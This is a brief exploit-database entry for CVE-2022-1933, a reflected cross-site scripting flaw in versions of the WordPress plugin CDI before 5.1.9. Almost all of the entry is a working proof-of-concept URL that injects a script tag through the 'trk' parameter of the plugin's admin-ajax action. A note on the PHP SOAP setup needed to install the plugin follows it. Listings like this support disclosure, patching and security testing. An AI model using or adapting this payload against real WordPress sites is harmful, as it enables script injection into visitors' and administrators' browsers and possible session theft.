Exploit for CDI < 5.1.9 - Reflected Cross-Site-Scripting CVE-2022-1933

Name: Exploit for CDI < 5.1.9 - Reflected Cross-Site-Scripting CVE-2022-1933
Rating: 5 (69 reviews)

2022-06-21 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:6CEDB27F-6140-4CBA-836F-63DE98E521BF
https://example.com/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(`xss`)%3C/script%3E

Note: PHP must be configured with --enable-soap as the plugin appears to import 'SoapClient', which when not found produces an error while installing the plugin.